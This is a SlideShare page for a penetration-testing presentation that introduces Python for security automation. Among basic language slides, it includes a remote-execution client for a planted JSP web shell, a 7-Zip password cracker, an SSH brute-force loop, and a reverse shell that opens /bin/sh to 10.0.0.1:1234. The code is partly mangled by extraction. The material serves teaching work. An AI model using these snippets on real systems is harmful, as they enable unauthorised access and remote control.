Python for Penetration testers

  • 3,368 views
Uploaded on

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
3,368
On Slideshare
0
From Embeds
0
Number of Embeds
4

Actions

Shares
Downloads
112
Comments
0
Likes
5

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Why?™  EASY (install, learn, code)™  Tons of libraries™  Code is easy to understand™  Multiplatform™  Good for prototyping
  • 2. History™  Conceived in late 80´s and first implementation in 1989™  Created by Guido Van Rossum™  Benevolent Dictator for Life™  Actually there are two branches 2.x and 3.0
  • 3. Python 101™  Interpreted language™  Object oriented™  Indentation is significant in Python, block delimiter.™  Usual control structures (if, while, etc)™  Multiple levels of organization (function, classes, modules, packages)
  • 4. Who is using Python?™  Core Impact ™  ImmunityDebugger™  Canvas ™  Peach™  W3AF ™  Sulley™  Sqlmap ™  Paimei™  Impacket ™  Scapy™  Google ™  Spike Proxy
  • 5. Python 101Data types: ™  Strings - “Hello” ™  Numbers - 123 ™  Lists – [‘hello’,’2’,’1’] ™  Tuples - (‘1’,’2’,’3’) (immutable) ™  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
  • 6. Python 101Structures:list=[1,2,3,4,5] if 3 > x: print “ 3 is bigger than” + x for x in list: else: print x print “ 3 is smaller than” + x
  • 7. Python 101Example Hello World: print “Hello World” With variables: msg=“Hello World” print msg
  • 8. Python 101™  Interactive python shell™  The commands execute line per line as you type™  Good for testing small pieces of code as loops, regex, etc™  Type “python” and enter to access the shell
  • 9. Python 101™  Strings starts counting in 0 and can have also negative indexes™  msg[0] is H™  msg[-1] is d
  • 10. Basic Code bitsimport sysofile = ”names.txt”fil = open(ofile,w’)x = fil.readlines()for y in x: print y
  • 11. Urllib2™  Library to deal with HTTP import urllib2 response = urllib2.urlopen(http://python.org/) html = response.read() print html
  • 12. Basic fuzzerimport sys, urllib2 ofile = ”dirs.txt” fil = open(ofile,w) dirs = fil.readlines() for x in dirs: response = urllib2.urlopen(http://python.org/’+x) html = response.read()
  • 13. Encodingimport base64 string=“TEST” base64.standard_b64encode(string) VEVTVA== import hashlib m=hashlib.new(md5’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf
  • 14. Generic Console for Web Remote Executionimport httplib, urllib, sys host=”XXXXXXXXXX” while 1: cmd=raw_input("Exploited@"+host+"#>") if cmd=="exit": sys.exit() else: h = httplib.HTTP(host) cmd=urllib.quote(cmd) print cmd h.putrequest(GET,”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd) h.putheader(Host, host) h.putheader(User-agent, Internet Explorer 6.0 ) h.endheaders() returncode, returnmsg, headers = h.getreply()
  • 15. 7 Zip Crackerimport os, sys, pylzma from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError pas = open(passwords.txt, rb) password=pas.readlines() for x in password: try: fp = open(test.7z, rb) archive = Archive7z(fp, password=x) print ”The password is" + x sys.exit() except Exception, e: fp.close()
  • 16. A Web browser#!/usr/bin/env python import sys from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * app = QApplication(sys.argv) web = QWebView() web.load(QUrl("http://www.edge-security.com")) web.show() sys.exit(app.exec_())
  • 17. One line Webserver™  python -m SimpleHTTPServer 8080
  • 18. SSH Bruteforcert = paramiko.Transport(hostname)try: t.start_client()except Exception: x=0try: t.auth_password(username=username,password=passw)except Exception: x=0if t.is_authenticated(): print “Password found “ + passw
  • 19. Proxy Strike Deflate Patch™  Pd contains the POST DATA in the repeat function: import zlib defla= zlib.compress(pd)
  • 20. Reverse Shellimport socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.0.0.1",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])
  • 21. Win32Com™  Library that allows us to access COM objects in Win32 systems™  We can automate Word, Excel, Powerpoint, access WMI, AD, etc
  • 22. Massive printingfrom win32com import clientimport timeword = client.Dispatch("Word.Application”)def printPDFDocument(filename): word.Documents.Open(filename) word.ActiveDocument.PrintOut() time.sleep(5) word.ActiveDocument.Close() word.Quit()printPDFDocument("c:test.doc")
  • 23. Excel Processingfrom win32com.client import Dispatch xlApp = Dispatch("Excel.Application") xlApp.Visible = 1 xlApp.Workbooks.open("test.xls") for x in range(1,100): nombre=str(xlApp.ActiveSheet.Cells(x,5)) print nombre xlApp.Quit()
  • 24. WMIimport wmic = wmi.WMI ()for process in c.Win32_Process (): print process.ProcessId, process.Name
  • 25. Interesting stuff™  http://dirk-loss.de/python-tools.htm™  http://code.activestate.com/recipes/langs/python/